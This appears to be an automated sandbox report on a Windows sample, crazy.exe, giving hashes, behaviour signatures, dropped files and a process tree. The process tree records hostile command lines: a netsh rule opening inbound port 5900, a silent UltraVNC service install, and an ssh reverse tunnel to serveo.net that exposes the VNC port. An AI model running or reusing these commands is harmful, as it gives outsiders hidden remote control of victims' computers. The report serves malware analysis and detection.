Analysis
- max time kernel: 150s
- max time network: 20s
- platform: windows7_x64
- resource: win7
- submitted: 24-06-2020 13:40

Static task: static1

Behavioral task: behavioral1
- Sample: crazy.exe
- Resource: win7 (windows7_x64)
- 0 signatures
- 0 seconds

Behavioral task: behavioral2
- Sample: crazy.exe
- Resource: win10v200430 (windows10_x64)
- 0 signatures
- 0 seconds
General
- Target: crazy.exe
- Size: 5.2MB
- MD5: 5681f1da959eb80af6735166b1e71cdb
- SHA1: 74036e08dea67fbbee5d81e07fb24408fe4305fe
- SHA256: 69cd9793d80b5e5d7f5bf377822dc573c84ef939ede4eedd892fd1b757435bff
- SHA512: d175f8adc5f6ac0e1a616bf24f1c3d884ca02e9f057e15ede43297ef0472a80a286ae032acaeedf9a6d87449fb6abe020fcdcb549f79429266919717f711f82d
- Score: 8/10
Malware Config
Signatures

Executes dropped EXE (5 IoCs)
Processes: winvnc.exe, winvnc.exe, test1.exe, test1.exe, winvnc.exe
  pid   process
  324   winvnc.exe
  1776  winvnc.exe
  1876  test1.exe
  1892  test1.exe
  1808  winvnc.exe

Suspicious use of SendNotifyMessage (29 IoCs)
Processes: winvnc.exe
  pid   process     count
  1808  winvnc.exe  29 (identical entries)

Drops file in Windows directory (10 IoCs)
Processes: cmd.exe
  description                   ioc                           process
  File opened for modification  C:\Windows\vnc\Install.bat    cmd.exe
  File created                  C:\Windows\vnc\test1.exe      cmd.exe
  File created                  C:\Windows\vnc\ultravnc.ini   cmd.exe
  File opened for modification  C:\Windows\vnc\ultravnc.ini   cmd.exe
  File opened for modification  C:\Windows\vnc\vnchooks.dll   cmd.exe
  File created                  C:\Windows\vnc\Install.bat    cmd.exe
  File created                  C:\Windows\vnc\vnchooks.dll   cmd.exe
  File created                  C:\Windows\vnc\winvnc.exe     cmd.exe
  File opened for modification  C:\Windows\vnc\winvnc.exe     cmd.exe
  File opened for modification  C:\Windows\vnc\test1.exe      cmd.exe

Runs net.exe

Modifies Windows Firewall (1 TTP)

Suspicious use of WriteProcessMemory (34 IoCs)
Processes: crazy.exe, cmd.exe, winvnc.exe, net.exe, test1.exe, test1.exe, winvnc.exe
  description                       pid   process     target process  count
  PID 1544 wrote to memory of 892   1544  crazy.exe   cmd.exe         7
  PID 892 wrote to memory of 324    892   cmd.exe     winvnc.exe      4
  PID 324 wrote to memory of 1036   324   winvnc.exe  net.exe         3
  PID 892 wrote to memory of 1504   892   cmd.exe     netsh.exe       4
  PID 1036 wrote to memory of 1692  1036  net.exe     net1.exe        3
  PID 892 wrote to memory of 1876   892   cmd.exe     test1.exe       4
  PID 1876 wrote to memory of 1892  1876  test1.exe   test1.exe       3
  PID 1892 wrote to memory of 1916  1892  test1.exe   cmd.exe         3
  PID 1776 wrote to memory of 1808  1776  winvnc.exe  winvnc.exe      3

Loads dropped DLL (8 IoCs)
Processes: cmd.exe, test1.exe, test1.exe
  pid   process    count
  892   cmd.exe    3
  1876  test1.exe  1
  1892  test1.exe  4

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes: winvnc.exe
  description            pid   process
  Token: SeTcbPrivilege  1776  winvnc.exe

Suspicious behavior: EnumeratesProcesses (89 IoCs)
Processes: winvnc.exe, winvnc.exe
  pid   process     count
  1776  winvnc.exe  3
  1808  winvnc.exe  86

Suspicious use of FindShellTrayWindow (58 IoCs)
Processes: winvnc.exe
  pid   process     count
  1808  winvnc.exe  58 (identical entries)

Modifies service (2 TTPs, 7 IoCs)
Processes: netsh.exe, winvnc.exe
  description      ioc                                                                                                             process
  Key created      \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI                                        netsh.exe
  Key created      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\uvnc_service                                                   winvnc.exe
  Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\uvnc_service\Description = "Provides secure remote desktop sharing"  winvnc.exe
  Key created      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig                                           netsh.exe
  Key created      \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups                          netsh.exe
  Key created      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas                                                  netsh.exe
  Key created      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs                                                  netsh.exe
Processes (process tree; indentation shows parent/child depth)

C:\Users\Admin\AppData\Local\Temp\crazy.exe (depth 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\crazy.exe"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe (depth 2)
    command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\463.tmp\Install.bat" "
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    - Loads dropped DLL

    C:\Windows\vnc\winvnc.exe (depth 3)
      command line: C:\Windows\vnc\winvnc -install
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      - Modifies service

      C:\Windows\system32\net.exe (depth 4)
        command line: net start "uvnc_service"
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\net1.exe (depth 5)
          command line: C:\Windows\system32\net1 start "uvnc_service"

    C:\Windows\SysWOW64\netsh.exe (depth 3)
      command line: netsh advfirewall firewall add rule name=vnc action=allow dir=in protocol=tcp localport=5900
      - Modifies service

    C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe (depth 3)
      command line: test1.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      - Loads dropped DLL

      C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe (depth 4)
        command line: test1.exe
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        - Loads dropped DLL

        C:\Windows\system32\cmd.exe (depth 5)
          command line: C:\Windows\system32\cmd.exe /c "ssh -o "StrictHostKeyChecking=no" -R itisme:5800:10.7.0.10:5900 serveo.net"

C:\Windows\vnc\winvnc.exe (depth 1)
  command line: "C:\Windows\vnc\winvnc.exe" -service
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses

  C:\Windows\vnc\winvnc.exe (depth 2)
    command line: C:\Windows\vnc\winvnc.exe -service_run
    - Executes dropped EXE
    - Suspicious use of SendNotifyMessage
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\463.tmp\Install.bat
- C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
- C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
- C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
- C:\Users\Admin\AppData\Local\Temp\463.tmp\ultravnc.ini
- C:\Users\Admin\AppData\Local\Temp\463.tmp\vnchooks.dll
- C:\Users\Admin\AppData\Local\Temp\463.tmp\winvnc.exe
- C:\Users\Admin\AppData\Local\Temp\_MEI18762\MSVCR90.dll
- C:\Users\Admin\AppData\Local\Temp\_MEI18762\python27.dll
- C:\Users\Admin\AppData\Local\Temp\_MEI18762\test1.exe.manifest
- C:\Users\Admin\AppData\Local\Temp\_MEI18~1\_socket.pyd
- C:\Users\Admin\AppData\Local\Temp\_MEI18~1\_ssl.pyd
- C:\Windows\vnc\UltraVNC.ini
- C:\Windows\vnc\winvnc.exe
- C:\Windows\vnc\winvnc.exe
- C:\Windows\vnc\winvnc.exe
- \Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
- \Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
- \Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
- \Users\Admin\AppData\Local\Temp\_MEI18762\msvcr90.dll
- \Users\Admin\AppData\Local\Temp\_MEI18762\python27.dll
- \Users\Admin\AppData\Local\Temp\_MEI18~1\_socket.pyd
- \Users\Admin\AppData\Local\Temp\_MEI18~1\_ssl.pyd
- \Windows\vnc\winvnc.exe

Memory dumps
- memory/324-7-0x0000000000000000-mapping.dmp
- memory/892-0-0x0000000000000000-mapping.dmp
- memory/1036-10-0x0000000000000000-mapping.dmp
- memory/1504-11-0x0000000000000000-mapping.dmp
- memory/1692-12-0x0000000000000000-mapping.dmp
- memory/1808-31-0x0000000000000000-mapping.dmp
- memory/1876-16-0x0000000000000000-mapping.dmp
- memory/1892-19-0x0000000000000000-mapping.dmp
- memory/1916-30-0x0000000000000000-mapping.dmp